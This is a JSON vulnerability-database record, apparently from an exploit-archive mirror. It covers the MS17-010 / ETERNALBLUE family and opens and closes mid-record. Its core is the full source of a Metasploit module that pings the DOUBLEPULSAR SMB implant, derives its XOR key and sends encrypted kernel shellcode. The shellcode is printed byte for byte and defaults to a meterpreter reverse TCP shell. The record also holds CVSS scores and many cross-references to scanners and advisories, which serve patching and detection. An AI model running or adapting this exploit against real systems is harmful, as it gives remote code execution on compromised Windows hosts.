"NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-03T00:16:48", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:25:08", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-29T22:25:08", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-03] #"}, "lastseen": "2021-10-03T00:16:48", "differentElements": ["sourceData"], "edition": 33}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "e0ec20a5c8398bf5ca1d6486b6c8c1d3", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-04T06:22:51", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27803"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:41987", "EDB-ID:42031", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": 